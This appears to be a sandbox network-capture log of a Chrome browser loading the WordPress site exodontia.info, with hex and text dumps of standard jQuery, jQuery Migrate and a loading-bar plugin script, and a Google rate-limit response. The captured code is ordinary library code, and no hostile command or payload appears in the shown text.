                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-ihojSGiPHkvH--0Vzdz2xA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                      Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                                      Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                      Date: Wed, 24 Apr 2024 10:14:03 GMT
                                                                                                                                      Server: gws
                                                                                                                                      Content-Length: 554
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      Set-Cookie: 1P_JAR=2024-04-24-10; expires=Fri, 24-May-2024 10:14:03 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                                                                      Set-Cookie: NID=513=Khla9iW9d4-aSdBOtdWED_vnr1Mi3PRO3EQ9kf0cNbLCvXTo1VoV38B1ckNwPjaM55imX2xbcdEisNrxYH-8_o3rEXYsus5zsf_4XvR1znnRL_ail1Z0Gs_foMUoWlJP18DXr8dDEtZzq7tZDn1Xko5tjFqrullCy0YoORAqAos; expires=Thu, 24-Oct-2024 10:14:02 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close
                                                                                                                                      2024-04-24 10:14:03 UTC554INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 63 6f 6d 70 6c 65 74 65 2f 73 65 61 72 63 68 25 33 46 63 6c
                                                                                                                                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/complete/search%3Fcl


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      105192.168.2.1649855153.92.6.1424437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:02 UTC558OUTGET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.1
                                                                                                                                      Host: exodontia.info
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                      Referer: https://exodontia.info/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:14:03 UTC599INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:14:03 GMT
                                                                                                                                      content-type: application/x-javascript
                                                                                                                                      last-modified: Thu, 11 Apr 2024 11:57:43 GMT
                                                                                                                                      etag: "15601-6617d037-66f2a107fdae3c08;;;"
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 87553
                                                                                                                                      date: Wed, 24 Apr 2024 10:14:03 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      platform: hostinger
                                                                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:14:03 UTC769INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 37 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                      Data Ascii: /*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                      2024-04-24 10:14:03 UTC14994INData Raw: 2c 75 3d 7b 74 79 70 65 3a 21 30 2c 73 72 63 3a 21 30 2c 6e 6f 6e 63 65 3a 21 30 2c 6e 6f 4d 6f 64 75 6c 65 3a 21 30 7d 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 28 6e 3d 6e 7c 7c 43 29 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 69 66 28 6f 2e 74 65 78 74 3d 65 2c 74 29 66 6f 72 28 72 20 69 6e 20 75 29 28 69 3d 74 5b 72 5d 7c 7c 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 26 26 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 72 29 29 26 26 6f 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 72 2c 69 29 3b 6e 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6f 29 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 6f 29 7d 66 75 6e 63 74 69 6f 6e 20 78 28 65 29 7b 72
                                                                                                                                      Data Ascii: ,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function x(e){r
                                                                                                                                      2024-04-24 10:14:03 UTC16384INData Raw: 6b 65 64 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 65 28 65 2c 22 69 6e 70 75 74 22 29 26 26 21 21 65 2e 63 68 65 63 6b 65 64 7c 7c 66 65 28 65 2c 22 6f 70 74 69 6f 6e 22 29 26 26 21 21 65 2e 73 65 6c 65 63 74 65 64 7d 2c 73 65 6c 65 63 74 65 64 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 65 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 21 30 3d 3d 3d 65 2e 73 65 6c 65 63 74 65 64 7d 2c 65 6d 70 74 79 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 65 3d 65 2e 66 69 72 73 74 43 68 69 6c 64 3b 65 3b 65 3d 65 2e 6e 65 78 74 53 69 62 6c 69 6e 67 29 69 66 28 65 2e 6e 6f 64 65 54 79 70 65 3c 36 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30
                                                                                                                                      Data Ascii: ked:function(e){return fe(e,"input")&&!!e.checked||fe(e,"option")&&!!e.selected},selected:function(e){return e.parentNode&&e.parentNode.selectedIndex,!0===e.selected},empty:function(e){for(e=e.firstChild;e;e=e.nextSibling)if(e.nodeType<6)return!1;return!0
                                                                                                                                      2024-04-24 10:14:04 UTC16384INData Raw: 65 2e 6d 61 6b 65 41 72 72 61 79 28 6e 29 29 3a 72 2e 70 75 73 68 28 6e 29 29 2c 72 7c 7c 5b 5d 7d 2c 64 65 71 75 65 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 3d 74 7c 7c 22 66 78 22 3b 76 61 72 20 6e 3d 63 65 2e 71 75 65 75 65 28 65 2c 74 29 2c 72 3d 6e 2e 6c 65 6e 67 74 68 2c 69 3d 6e 2e 73 68 69 66 74 28 29 2c 6f 3d 63 65 2e 5f 71 75 65 75 65 48 6f 6f 6b 73 28 65 2c 74 29 3b 22 69 6e 70 72 6f 67 72 65 73 73 22 3d 3d 3d 69 26 26 28 69 3d 6e 2e 73 68 69 66 74 28 29 2c 72 2d 2d 29 2c 69 26 26 28 22 66 78 22 3d 3d 3d 74 26 26 6e 2e 75 6e 73 68 69 66 74 28 22 69 6e 70 72 6f 67 72 65 73 73 22 29 2c 64 65 6c 65 74 65 20 6f 2e 73 74 6f 70 2c 69 2e 63 61 6c 6c 28 65 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 65 2e 64 65 71 75 65 75 65 28 65 2c 74 29 7d
                                                                                                                                      Data Ascii: e.makeArray(n)):r.push(n)),r||[]},dequeue:function(e,t){t=t||"fx";var n=ce.queue(e,t),r=n.length,i=n.shift(),o=ce._queueHooks(e,t);"inprogress"===i&&(i=n.shift(),r--),i&&("fx"===t&&n.unshift("inprogress"),delete o.stop,i.call(e,function(){ce.dequeue(e,t)}
                                                                                                                                      2024-04-24 10:14:04 UTC16384INData Raw: 3d 30 2c 72 3d 74 68 69 73 2e 6c 65 6e 67 74 68 3b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 65 26 26 31 3d 3d 3d 74 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 20 74 2e 69 6e 6e 65 72 48 54 4d 4c 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 21 4f 65 2e 74 65 73 74 28 65 29 26 26 21 6b 65 5b 28 54 65 2e 65 78 65 63 28 65 29 7c 7c 5b 22 22 2c 22 22 5d 29 5b 31 5d 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 29 7b 65 3d 63 65 2e 68 74 6d 6c 50 72 65 66 69 6c 74 65 72 28 65 29 3b 74 72 79 7b 66 6f 72 28 3b 6e 3c 72 3b 6e 2b 2b 29 31 3d 3d 3d 28 74 3d 74 68 69 73 5b 6e 5d 7c 7c 7b 7d 29 2e 6e 6f 64 65 54 79 70 65 26 26 28 63 65 2e 63 6c 65 61 6e 44 61 74 61 28 53 65 28 74 2c 21 31 29 29 2c 74 2e 69 6e 6e 65 72 48 54 4d 4c 3d 65 29 3b
                                                                                                                                      Data Ascii: =0,r=this.length;if(void 0===e&&1===t.nodeType)return t.innerHTML;if("string"==typeof e&&!Oe.test(e)&&!ke[(Te.exec(e)||["",""])[1].toLowerCase()]){e=ce.htmlPrefilter(e);try{for(;n<r;n++)1===(t=this[n]||{}).nodeType&&(ce.cleanData(Se(t,!1)),t.innerHTML=e);
                                                                                                                                      2024-04-24 10:14:04 UTC16384INData Raw: 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 3f 65 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 65 2e 6d 61 74 63 68 28 44 29 7c 7c 5b 5d 7d 63 65 2e 66 6e 2e 65 78 74 65 6e 64 28 7b 70 72 6f 70 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 4d 28 74 68 69 73 2c 63 65 2e 70 72 6f 70 2c 65 2c 74 2c 31 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 7d 2c 72 65 6d 6f 76 65 50 72 6f 70 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 74 68 69 73 5b 63 65 2e 70 72 6f 70 46 69 78 5b 65 5d 7c 7c 65 5d 7d 29 7d 7d 29 2c 63 65 2e 65 78 74 65 6e 64 28 7b 70 72 6f 70 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20
                                                                                                                                      Data Ascii: rray.isArray(e)?e:"string"==typeof e&&e.match(D)||[]}ce.fn.extend({prop:function(e,t){return M(this,ce.prop,e,t,1<arguments.length)},removeProp:function(e){return this.each(function(){delete this[ce.propFix[e]||e]})}}),ce.extend({prop:function(e,t,n){var
                                                                                                                                      2024-04-24 10:14:04 UTC6254INData Raw: 6f 6e 28 65 2c 74 29 7b 72 3d 63 65 28 22 3c 73 63 72 69 70 74 3e 22 29 2e 61 74 74 72 28 6e 2e 73 63 72 69 70 74 41 74 74 72 73 7c 7c 7b 7d 29 2e 70 72 6f 70 28 7b 63 68 61 72 73 65 74 3a 6e 2e 73 63 72 69 70 74 43 68 61 72 73 65 74 2c 73 72 63 3a 6e 2e 75 72 6c 7d 29 2e 6f 6e 28 22 6c 6f 61 64 20 65 72 72 6f 72 22 2c 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 2e 72 65 6d 6f 76 65 28 29 2c 69 3d 6e 75 6c 6c 2c 65 26 26 74 28 22 65 72 72 6f 72 22 3d 3d 3d 65 2e 74 79 70 65 3f 34 30 34 3a 32 30 30 2c 65 2e 74 79 70 65 29 7d 29 2c 43 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 72 5b 30 5d 29 7d 2c 61 62 6f 72 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 26 26 69 28 29 7d 7d 7d 29 3b 76 61 72 20 4a 74 2c 4b 74 3d 5b 5d 2c 5a 74 3d 2f 28 3d 29 5c 3f
                                                                                                                                      Data Ascii: on(e,t){r=ce("<script>").attr(n.scriptAttrs||{}).prop({charset:n.scriptCharset,src:n.url}).on("load error",i=function(e){r.remove(),i=null,e&&t("error"===e.type?404:200,e.type)}),C.head.appendChild(r[0])},abort:function(){i&&i()}}});var Jt,Kt=[],Zt=/(=)\?


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      106192.168.2.1649854153.92.6.1424437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:02 UTC566OUTGET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 HTTP/1.1
                                                                                                                                      Host: exodontia.info
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                      Referer: https://exodontia.info/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:14:03 UTC598INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:14:03 GMT
                                                                                                                                      content-type: application/x-javascript
                                                                                                                                      last-modified: Thu, 11 Apr 2024 11:57:43 GMT
                                                                                                                                      etag: "3509-6617d037-e626d5183953658e;;;"
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 13577
                                                                                                                                      date: Wed, 24 Apr 2024 10:14:03 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      platform: hostinger
                                                                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:14:03 UTC770INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 4d 69 67 72 61 74 65 20 76 33 2e 34 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 26 26 28 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 3d 21 30 29 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72
                                                                                                                                      Data Ascii: /*! jQuery Migrate v3.4.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */"undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){r
                                                                                                                                      2024-04-24 10:14:03 UTC12807INData Raw: 72 28 76 61 72 20 65 3d 30 3b 65 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 64 65 6c 65 74 65 20 74 5b 61 72 67 75 6d 65 6e 74 73 5b 65 5d 5d 7d 2c 73 2e 6d 69 67 72 61 74 65 49 73 50 61 74 63 68 45 6e 61 62 6c 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 74 5b 65 5d 7d 2c 6e 2e 63 6f 6e 73 6f 6c 65 26 26 6e 2e 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 26 26 28 73 26 26 65 28 22 33 2e 30 2e 30 22 29 26 26 21 65 28 22 35 2e 30 2e 30 22 29 7c 7c 6e 2e 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 4a 51 4d 49 47 52 41 54 45 3a 20 6a 51 75 65 72 79 20 33 2e 78 2d 34 2e 78 20 52 45 51 55 49 52 45 44 22 29 2c 73 2e 6d 69 67 72 61 74 65 57 61 72 6e 69 6e 67 73 26 26 6e 2e 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 4a 51 4d 49 47 52 41 54
                                                                                                                                      Data Ascii: r(var e=0;e<arguments.length;e++)delete t[arguments[e]]},s.migrateIsPatchEnabled=function(e){return!t[e]},n.console&&n.console.log&&(s&&e("3.0.0")&&!e("5.0.0")||n.console.log("JQMIGRATE: jQuery 3.x-4.x REQUIRED"),s.migrateWarnings&&n.console.log("JQMIGRAT


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      107192.168.2.1649860153.92.6.1424437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:03 UTC595OUTGET /wp-content/plugins/loading-page/loading-screens/bar/loading-bar.js?ver=free-1.1.10 HTTP/1.1
                                                                                                                                      Host: exodontia.info
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: */*
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                      Referer: https://exodontia.info/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:14:04 UTC596INHTTP/1.1 200 OK
                                                                                                                                      Connection: close
                                                                                                                                      cache-control: public, max-age=604800
                                                                                                                                      expires: Wed, 01 May 2024 10:14:03 GMT
                                                                                                                                      content-type: application/x-javascript
                                                                                                                                      last-modified: Wed, 17 Apr 2024 22:07:26 GMT
                                                                                                                                      etag: "68b-6620481e-b9e4857879f697b9;;;"
                                                                                                                                      accept-ranges: bytes
                                                                                                                                      content-length: 1675
                                                                                                                                      date: Wed, 24 Apr 2024 10:14:03 GMT
                                                                                                                                      server: LiteSpeed
                                                                                                                                      platform: hostinger
                                                                                                                                      content-security-policy: upgrade-insecure-requests
                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                      2024-04-24 10:14:04 UTC772INData Raw: 76 61 72 20 63 70 5f 6c 6f 61 64 69 6e 67 70 61 67 65 3d 63 70 5f 6c 6f 61 64 69 6e 67 70 61 67 65 7c 7c 7b 7d 3b 63 70 5f 6c 6f 61 64 69 6e 67 70 61 67 65 2e 67 72 61 70 68 69 63 73 3d 63 70 5f 6c 6f 61 64 69 6e 67 70 61 67 65 2e 67 72 61 70 68 69 63 73 7c 7c 7b 7d 3b 63 70 5f 6c 6f 61 64 69 6e 67 70 61 67 65 2e 67 72 61 70 68 69 63 73 2e 62 61 72 3d 7b 63 72 65 61 74 65 64 3a 21 31 2c 61 74 74 72 3a 7b 7d 2c 63 72 65 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3d 61 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 7c 7c 22 23 30 30 30 30 30 30 22 3b 61 2e 68 65 69 67 68 74 3d 61 2e 68 65 69 67 68 74 7c 7c 31 3b 61 2e 66 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 3d 61 2e 66 6f 72 65 67 72 6f 75 6e 64
                                                                                                                                      Data Ascii: var cp_loadingpage=cp_loadingpage||{};cp_loadingpage.graphics=cp_loadingpage.graphics||{};cp_loadingpage.graphics.bar={created:!1,attr:{},create:function(a){a.backgroundColor=a.backgroundColor||"#000000";a.height=a.height||1;a.foregroundColor=a.foreground
                                                                                                                                      2024-04-24 10:14:04 UTC903INData Raw: 22 5d 3d 22 63 6f 6e 74 61 69 6e 22 2c 62 5b 22 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 22 5d 3d 22 63 6f 6e 74 61 69 6e 22 29 29 3b 74 68 69 73 2e 61 74 74 72 2e 6f 76 65 72 6c 61 79 3d 6a 51 75 65 72 79 28 22 3c 64 69 76 20 63 6c 61 73 73 3d 27 6c 70 2d 73 63 72 65 65 6e 27 3e 3c 2f 64 69 76 3e 22 29 2e 63 73 73 28 62 29 2e 61 70 70 65 6e 64 54 6f 28 22 68 74 6d 6c 22 29 3b 74 68 69 73 2e 61 74 74 72 2e 62 61 72 3d 6a 51 75 65 72 79 28 22 3c 64 69 76 20 63 6c 61 73 73 3d 27 6c 70 2d 73 63 72 65 65 6e 2d 67 72 61 70 68 69 63 27 3e 3c 2f 64 69 76 3e 22 29 2e 63 73 73 28 7b 68 65 69 67 68 74 3a 61 2e 68 65 69 67 68 74 2b 22 70 78 22 2c 6d 61 72 67 69 6e 54 6f 70 3a 22 2d 22 2b 61 2e 68 65 69 67 68 74 2f 32 2b 22 70 78 22 2c 62 61 63 6b 67 72 6f 75 6e
                                                                                                                                      Data Ascii: "]="contain",b["background-size"]="contain"));this.attr.overlay=jQuery("<div class='lp-screen'></div>").css(b).appendTo("html");this.attr.bar=jQuery("<div class='lp-screen-graphic'></div>").css({height:a.height+"px",marginTop:"-"+a.height/2+"px",backgroun


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      108192.168.2.1649863142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:14:03 UTC815OUTGET /sorry/index?continue=https://www.google.com/complete/search%3Fclient%3Dchrome-omni%26gs_ri%3Dchrome-ext-ansg%26xssi%3Dt%26q%3D%26oit%3D0%26gs_rn%3D42%26sugkey%3DAIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw&q=EgSaEGkkGOq2o7EGIjCFqtejcJY6F0uPQ2ZgEB_9ydMr9SMKXELgCbU-jevUbU7nAYltJT1tCsx5jLDtktQyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                                                                                      Host: www.google.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:14:04 UTC356INHTTP/1.1 429 Too Many Requests
                                                                                                                                      Date: Wed, 24 Apr 2024 10:14:03 GMT
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Server: HTTP server (unknown)
                                                                                                                                      Content-Length: 3511
                                                                                                                                      X-XSS-Protection: 0
